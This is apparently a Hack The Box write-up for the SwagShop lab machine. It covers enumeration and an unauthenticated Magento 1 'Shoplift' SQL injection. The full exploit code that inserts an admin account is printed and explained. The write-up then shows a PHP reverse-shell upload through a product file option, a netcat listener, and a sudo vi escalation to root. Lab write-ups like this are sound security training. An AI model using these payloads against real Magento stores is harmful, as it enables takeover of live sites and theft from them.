# SwagShop HTB

IP

```
10.10.10.140
```

Initial nmap scan (all TCP ports at a high packet rate, then only the `port/proto` lines are kept and collapsed into a comma-separated list for the follow-up scan):

```
sudo nmap -p- --min-rate 10000 10.10.10.140 | grep '^[0-9]' | cut -d"/" -f1 | tr '\n' ','
```

We can see the following two ports are open:

`22,80`

Let's run a more in-depth service and script scan against just those ports:

```
sudo nmap -sCV -p22,80 10.10.10.140 -oA nmap_results
```

results

```
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-18 01:47 EST
Nmap scan report for 10.10.10.140
Host is up (0.026s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Did not follow redirect to http://swagshop.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.38 seconds
```

We can see the following:

* SSH (OpenSSH 7.6p1, Ubuntu) is running
* Apache 2.4.29 is the web server
* The HTTP title shows a redirect to `swagshop.htb`; add that hostname to `/etc/hosts` pointing at 10.10.10.140 before browsing, or the redirect will fail

**HTTP Port 80**

Let's get feroxbuster running in the background to identify any interesting web pages:

```
feroxbuster -u http://swagshop.htb/ -t 50 -L 5 -n -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php
```

Looking at the web server we can see the following

<figure><img src="https://3268621211-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FQ0Egip1S9PA8zcUeKiqm%2Fuploads%2FoReVK1nOXx0y9YNb50It%2Fimage.png?alt=media&#x26;token=e5b6511d-0fee-4326-924a-e00b5cb1be67" alt=""><figcaption></figcaption></figure>

Already we can see the web server is:

* an Ubuntu server
* running Magento
  * the page dates itself to 2014, which points at an old Magento 1.x build; Magento 1 releases of that era are exposed to the "Shoplift" SQL injection / RCE chain
* running on PHP
* backed by MySQL

When we look at the About Us page we can see a possible username:

<figure><img src="https://3268621211-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FQ0Egip1S9PA8zcUeKiqm%2Fuploads%2F1WE1sHe2E6Q5x8TNYXLL%2Fimage.png?alt=media&#x26;token=dcbfb965-97fe-4b21-a20c-5e7faee2e072" alt=""><figcaption></figcaption></figure>

`John Doe`

We can see there is an option to create an account.

Let's create an account and proxy the traffic through Burp to see if any interesting requests are being made.

* We now have an account
* Nothing too interesting in the requests

Let's see if we can exploit Magento.

Looking at `http://swagshop.htb/var/package/Magento_Mobile-1.8.0.0.23.2.xml`, which feroxbuster found, we can pull out a version string:

```
1.8.0.0.23.2
```

Strictly this is the version of the bundled Magento_Mobile package rather than of Magento itself, but it places the install firmly in the Magento 1.x line. After some quick googling we can see that unpatched Magento 1 is vulnerable to the "Shoplift" pre-authentication SQL injection (CVE-2015-1397, fixed by patch SUPEE-5344), which we can use to insert an admin account directly into the database.

We can use the following script:

{% embed url="<https://github.com/joren485/Magento-Shoplift-SQLI/blob/master/poc.py>" %}

What the script actually does

The script performs a SQL injection against a Magento 1 store. It targets the `Cms_Wysiwyg` directive controller under the admin path (reachable without authentication on unpatched installs) and uses stacked queries to create a new admin user with hard-coded credentials. Here's a step-by-step breakdown:

1. **Import Libraries:**

   ```python
   import requests
   import base64
   import sys
   ```
2. **Retrieve Target URL:**

   ```python
   target = sys.argv[1]
   ```

   The script expects the target website URL as a command-line argument.
3. **Ensure Target URL Format:**

   ```python
   if not target.startswith("http"):
       target = "http://" + target

   if target.endswith("/"):
       target = target[:-1]
   ```

   These lines ensure that the target URL starts with `http://` (if no scheme was given) and does not end with a trailing slash.
4. **Construct Target URL for Admin Interface:**

   ```python
   target_url = target + "/index.php/admin/Cms_Wysiwyg/directive/index/"
   ```

   The target URL points at the WYSIWYG directive controller inside the admin router. Despite living under `/admin/`, this action could be reached without logging in, which is what makes the bug exploitable pre-auth.
5. **SQL Injection Payload:**

   ```python
   SQLQUERY = """
   SET @SALT = 'rp';
   SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
   SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
   INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
   INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
   """
   ```

   This is the SQL injection payload. It builds a Magento 1 style password hash (`md5(salt + password)` followed by `:salt`), copies the `extra` blob from an existing admin so the new row deserialises cleanly, inserts the user into `admin_user`, and then gives it an `admin_role` row of type `U` under `parent_id` 1 (the built-in Administrators role) so the account has full privileges.
6. **Format and Encode Payload:**

   ```python
   query = SQLQUERY.replace("\n", "").format(username="ypwq", password="123")
   pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)
   ```

   The payload is collapsed to a single line and the username (`ypwq`) and password (`123`) are filled in. It is then appended to a report-grid filter: `popularity[field_expr]=0);` closes the numeric expression the grid builds from `field_expr`, so everything after it runs as additional statements. (The base64 encoding happens in the next step, when the request is assembled.)
7. **Craft HTTP Request:**

   ```python
   r = requests.post(target_url, 
                     data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
                           "filter": base64.b64encode(pfilter),
                           "forwarded": 1})
   ```

   An HTTP POST request is sent to the target URL. `___directive` is the (unpadded) base64 of `{{block type=Adminhtml/report_search_grid output=getCsvFile}}`, a template directive that makes the controller instantiate the admin report grid and render it as CSV, which is what evaluates the attacker-controlled `filter`. `filter` carries the base64-encoded grid filter with our stacked queries, and `forwarded=1` is sent alongside as the PoC requires.
8. **Check Response:**

   ```python
   if r.ok:
       print "WORKED"
       print "Check {0}/admin with creds ypwq:123".format(target)
   else:
       print "DID NOT WORK"
   ```

   `r.ok` is true for any HTTP status below 400, so "WORKED" only means the endpoint accepted the request, not that the insert definitely happened. The real confirmation is being able to log in at `/admin` with `ypwq:123`.

Once we have run the script we should have an admin user in the CMS:

```
python2 exploit.py 10.10.10.140
```

<figure><img src="https://3268621211-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FQ0Egip1S9PA8zcUeKiqm%2Fuploads%2FB9iEmNmmvVWGh5W6h3AL%2Fimage.png?alt=media&#x26;token=61b8ca08-dcab-49ec-9d77-fa95342c2532" alt=""><figcaption></figcaption></figure>

Now when we navigate to `http://swagshop.htb/index.php/admin/` we can log in with the supplied credentials and access the admin panel.

Looking through the CMS we have the option to add pages, and knowing the site runs on PHP we could potentially get a PHP reverse shell onto the box and gain a foothold.

We will use pentestmonkey's PHP reverse shell:

```
cp /usr/share/webshells/php/php-reverse-shell.php ./
```

Edit the script so `$ip` and `$port` point at our local listener:

<figure><img src="https://3268621211-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FQ0Egip1S9PA8zcUeKiqm%2Fuploads%2FW0InSKvWhcfE4rTzcw5V%2Fimage.png?alt=media&#x26;token=d0b259b2-8148-4663-89f6-7085c5d04065" alt=""><figcaption></figcaption></figure>

Let's start an nc listener:

```
rlwrap -cAr nc -lvnp 9001
```

Now let's try to get the PHP file onto the server.

* Adding it as a CMS page didn't work. CMS pages are stored in the database and rendered through the template engine, so a page never becomes a file on disk. Let's rethink this.

What we can do instead is add a custom option of type File to one of the products. Customer uploads for custom options are written to disk under `media/`, and the allowed extensions are controlled from the admin panel, so we can permit `.php`.

To do this:

Within **Catalog** -> **Manage Products** we edit one of the existing products.

<figure><img src="https://3268621211-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FQ0Egip1S9PA8zcUeKiqm%2Fuploads%2FDIx1Urwlhw0nMTQfVvLY%2Fimage.png?alt=media&#x26;token=00505eeb-2ccb-4086-bc04-8cd1f1c82f19" alt=""><figcaption></figcaption></figure>

In the left panel we click on Custom Options.

<figure><img src="https://3268621211-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FQ0Egip1S9PA8zcUeKiqm%2Fuploads%2FSgQpG7Tb2f51JpXw5tyV%2Fimage.png?alt=media&#x26;token=fa3bfa2c-f061-45e1-acb2-13d4d1d99b8e" alt=""><figcaption></figcaption></figure>

Click on Add New Option.

Then set the input type to File and specify `php` as an allowed extension.

<figure><img src="https://3268621211-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FQ0Egip1S9PA8zcUeKiqm%2Fuploads%2F37DOwvESyPsTpXaz2gra%2Fimage.png?alt=media&#x26;token=09b5867b-0b2d-49e6-b7a4-102915479036" alt=""><figcaption></figcaption></figure>

Click Save.

Now when we view the chosen product on the storefront we have the option to upload a `.php` file.

<figure><img src="https://3268621211-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FQ0Egip1S9PA8zcUeKiqm%2Fuploads%2FfhSNZDmI23fV98BCo3uH%2Fimage.png?alt=media&#x26;token=42ec79fa-8e30-4a4e-bd6c-9df70a25716f" alt=""><figcaption></figcaption></figure>

Once we have uploaded our reverse shell and added the product to the cart, Magento stores the quote upload under `media/custom_options/quote/`, dispersed into sub-directories named after the first two characters of the file name (`p/h/` for `php-reverse-shell.php`; rename the shell and the path changes). We should therefore be able to navigate to

{% embed url="<http://swagshop.htb/media/custom_options/quote/p/h/>" %}

where our shell is sitting in the directory listing. Clicking it makes Apache execute it, and it calls back to our listener.

<figure><img src="https://3268621211-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FQ0Egip1S9PA8zcUeKiqm%2Fuploads%2FnP7pG95nRONGpb1ZaItT%2Fimage.png?alt=media&#x26;token=ff80f4f4-a9a5-42cf-a4d8-9928323b2044" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3268621211-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FQ0Egip1S9PA8zcUeKiqm%2Fuploads%2FtOROQ5c7jeQ3jdIVV9c9%2Fimage.png?alt=media&#x26;token=31ff64b9-d26c-449c-bebe-3545499c00b0" alt=""><figcaption></figcaption></figure>

## Privilege escalation from www-data

First let's upgrade to a proper PTY:

```
python3 -c 'import pty;pty.spawn("/bin/bash")'
```

Checking our sudo privileges:

```
sudo -l
```

<figure><img src="https://3268621211-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FQ0Egip1S9PA8zcUeKiqm%2Fuploads%2Fu75ogbT0bTLljLErKh4v%2Fimage.png?alt=media&#x26;token=c56c44a0-793d-447b-9d7b-effd6d7617d0" alt=""><figcaption></figcaption></figure>

We can run vi as root, which is good. Let's check GTFOBins for a shell escape:

{% embed url="<https://gtfobins.github.io/>" %}

The sudoers rule lets us run `/usr/bin/vi` as root on any file under `/var/www/html` without a password. The file argument is irrelevant, because once vi is running as root we can spawn a shell from inside it:

```
sudo /usr/bin/vi /var/www/html/index.php
# within vi 
:set shell=/bin/sh
:shell
```

We are now root:

<figure><img src="https://3268621211-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FQ0Egip1S9PA8zcUeKiqm%2Fuploads%2FuJ0shjDi0KWYMhuToE0v%2Fimage.png?alt=media&#x26;token=47c50773-9aad-494d-96de-cd8e37f8665a" alt=""><figcaption></figcaption></figure>
